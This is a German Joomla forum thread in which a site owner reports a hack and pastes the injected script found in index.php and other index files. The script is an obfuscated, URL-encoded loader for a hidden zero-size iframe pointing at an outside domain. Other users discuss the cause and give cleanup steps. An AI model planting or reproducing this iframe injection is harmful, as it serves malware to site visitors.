Trojaner
Leute,
wir haben scheinbar Besuch bekommen.
Folgendes in der index.php
<!-- o --><script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E %76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%6 4%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20% 68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65 %3E'));
//-->
</script><!-- c -->
Virenscanner meldet einen Trojaner
Öööm.. Jaaa.. Eemm..
Interessiert mich eigentlich nicht wirklich
Möchtest du ein Drink, was zu Futtern? Eeem.. Oder was meinst du? ^^
Vielleicht mal Backup hochknallen? Joomla Version? Hoster kontaktieren.. Emm.. Ich glaub Einträge dazu findest du genügend
Awesomeness
When you get sad, stop being sad and be awesome instead
Ice Media ist ein Verzeichnis der Ice Gallery...
http://www.fretties.de|http://www.frettchenfreunde-osnabrueck.de
Falls Dir mein Beitrag geholfen hat bitte auf "danke" klicken
Tipp zur weiteren Vorgehensweise...Zitat von Free
Gruß
Joomla! Extensions by Kubik-Rubik.de
Keine Beantwortung von Supportanfragen per PN
Joomla! braucht Dich!
Wen es interessiert, wir fanden den Code in folgenden Dateien:
index.php
templates\index.html
modules\index.html
media\index.html
mambots\index.html
language\index.html
includes\index.html
images\index.html
help\index.html
editor\index.html
components\index.html
cache\index.html
und natürlich in der index.php des Templates.
Die Datenbank ist verschont geblieben
Die Ursache, ist wie so oft, ein mangelndes Verständnis für die Wichtigkeit des Passwortes. Der Kunde benutzte ein 6-stelliges Wort, aus dem Duden.
@sh4d0w
Danke für Dein kreatives Feedback.
Ich googelte nach dem Schadcode und fand nur 2 Treffer, die offtopic waren. Also dachte ich, dies sei für die Joomlaner von Interesse.
Gut, ich werde solche Infos nicht mehr posten. Dieses "übers Maul fahren" mit der omnipräsenten Warnung "Suchfunktion benutzen", die immer gern gesehen ist, hängt mir langsam zum Hals raus.
@ Admin
Bitte lösche mein Account
Danke!
Sicher?
Welches Passwort ist gemeint? Das für FTP oder für den Admin-Zugang?
Gruß! Uwe
fc-hosting.de
. . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun? :: Migration 1.7->2.5
Tust du uns bitten einen Gefallen und scherst nicht alle über einen Kamm? Weiter ist deine Meldung "wir haben scheinbar Besuch bekommen. Folgendes in der index.php...", ohne weitere Infos (J!-Version, installieter Komponenten etc.) nicht nachvollziehbar.
Mit dem PW hat dein Problem am wenigsten zu tun... darum der Tipp, mal die SuFu zu benutzen. Oder soll es jemand anderes für dich machen und hier posten?
Greetinxx N8Surfer
Wenn man etwas haben möchte, was man noch nie gehabt hat,
dann muss man etwas tun, was man noch nie getan hat.
Ob das was mit dem Passwort zu tun hat oder nciht, kann man pauschal weder verneinen noch bejahren. Wir hatten schon einige Fälle, wo FTP-Passwörter bekannt waren und darüber ein Web geändert wurde (auch nur die index.php's in den Ordnern). Der Standard-Angriff ist aber das Ausnutzen von Script-Lücken.
Hier helfen nur die Webserverlogs UND FTP-Logs, um zweifelsfrei festzustellen zu können, woher der Angriff kam. Nur die Tatsache des Vorhandenseins eines simplen Paswortes ist kein Beweis für dessen Ausnutzung.
Wurden die Logs geprüft und wurde die Angreifer-IP erkannt und wurden alle Aktivitäten zu dieser IP tatsächlich identifiziert?
Wenn nicht oder wenn nicht mehr möglich oder überhaupt nicht möglich (warum auch immer), dann muss ich meine Standleier runterbeten, wo diese dann bei Punkt 3) schon aufhört.
1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
2) Datenbankinhalt entfernen
3) Letzte definitv saubere Sicherung einspielen
4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
5) Log-Dateien holen und Einbruchslücke lokalisieren
6) Lücke schließen!
Gruß! Uwe
fc-hosting.de
. . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun? :: Migration 1.7->2.5
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen